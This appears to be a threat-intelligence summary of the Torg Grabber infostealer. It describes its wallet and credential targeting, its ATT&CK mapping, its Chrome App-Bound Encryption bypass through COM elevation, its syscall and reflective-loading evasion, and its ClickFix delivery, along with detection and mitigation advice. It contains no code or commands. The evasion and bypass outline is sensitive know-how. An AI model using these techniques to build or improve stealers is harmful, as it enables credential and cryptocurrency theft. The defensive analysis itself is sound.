Full Report
A new info-stealing malware called Torg Grabber is stealing sensitive data from 850 browser extensions, more than 700 of them for cryptocurrency wallets. [...]
Analysis Summary
# Tool/Technique: Torg Grabber
## Overview
Torg Grabber is a rapidly evolving information-stealing malware primarily focused on the exfiltration of cryptocurrency wallet data, credentials, and sensitive browser information. It is distinguished by its aggressive targeting of over 850 browser extensions and its frequent update cycle, with hundreds of unique samples observed within a three-month period.
## Technical Details
- **Type**: Information Stealer (Infostealer)
- **Platform**: Windows (Targets Chromium and Firefox-based browsers)
- **Capabilities**: Credential theft, crypto-wallet hijacking, App-Bound Encryption (ABE) bypass, file exfiltration, and remote shellcode execution.
- **First Seen**: December 2025
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566.002 - Phishing: Spearphishing Link (Used in conjunction with ClickFix)
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1620 - Reflective Code Loading
- **TA0005 - Evasion**
- T1562.001 - Impair Defenses: Disable or Modify Tools (AV detection/profiling)
- T1106 - Native API (Direct syscalls)
- T1497 - Virtualization/Sandbox Evasion (Anti-analysis mechanisms)
- **TA0006 - Credential Access**
- T1555.003 - Credentials from Web Browsers
- T1539 - Steal Web Session Cookie
- T1606.002 - Forge Web Credentials: App-Bound Encryption bypass
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (HTTPS/Cloudflare)
## Functionality
### Core Capabilities
- **Mass Extension Targeting**: Targets 728 crypto wallets, 103 password managers/2FA tools, and 19 note-taking apps.
- **Browser Data Theft**: Extracts history, cookies, and autofill data from 25 Chromium and 8 Firefox variants.
- **Application Targeting**: Steals data from Discord, Telegram, Steam, VPN clients, FTP clients, and desktop wallet apps.
- **System Profiling**: Creates hardware fingerprints and scans for 24 different antivirus products.
- **File Exfiltration**: Recursively searches and steals files from the `Desktop` and `Documents` folders.
### Advanced Features
- **App-Bound Encryption (ABE) Bypass**: Utilizes a DLL injection method (branded "Underground") to bypass Chrome’s modern cookie protection by accessing the COM Elevation Service.
- **Evasive Execution**: Uses direct syscalls to bypass security hooks and executes payloads entirely in memory via reflective loading.
- **Dynamic C2 Infrastructure**: Leverages Cloudflare-routed HTTPS connections with chunked data uploads; C2 domains are rotated weekly.
- **Encrypted Shellcode Execution**: Capable of executing remote shellcode delivered in ChaCha-encrypted and zlib-compressed formats.
## Indicators of Compromise
- **File Hashes**: *Not specifically listed in the article, but 334 unique samples identified (Dec 2025 - Feb 2026).*
- **Process Behaviors**:
- Malicious PowerShell execution following "ClickFix" social engineering prompts.
- Clipboard hijacking to replace wallet addresses or facilitate script execution.
- DLL injection into browser processes (`chrome.exe`, `msedge.exe`).
- **Network Indicators**:
- Exfiltration via HTTPS over Cloudflare.
- Custom encrypted TCP protocols (deprecated in older versions).
- Telegram API usage (deprecated in older versions).
## Associated Threat Actors
- **Unknown**: Currently attributed to a likely burgeoning "Malware-as-a-Service" (MaaS) model, with at least 40 distinct "tags" (affiliate identifiers) documented.
## Detection Methods
- **Behavioral Detection**: Monitor for unusual PowerShell activity triggered by browser interactions. Detect reflective DLL injection and unauthorized access to the Chrome COM Elevation Service.
- **Network Defense**: Inspect outbound HTTPS traffic for large, chunked data uploads to unusual Cloudflare-backed endpoints.
- **Memory Scanning**: Identify decoupled shellcode or PE files residing in memory without back-backing disk files.
## Mitigation Strategies
- **User Education**: Train users to recognize "ClickFix" tactics where sites claim a browser error exists and provide a "fix" via a PowerShell command string.
- **System Hardening**: Implement PowerShell Constrained Language Mode and enable Script Block Logging.
- **Access Control**: Restrict the ability of standard users to execute administrative commands or interact with sensitive system COM objects.
- **Browser Security**: Use browser policies to restrict the installation of unapproved or sideloaded extensions.
## Related Tools/Techniques
- **ClickFix**: The primary initial access technique.
- **VoidStealer**: Shares similar methods for extracting Chrome master keys via debugger/COM tricks.
- **Underground**: A standalone component/tool used by Torg Grabber for browser data extraction.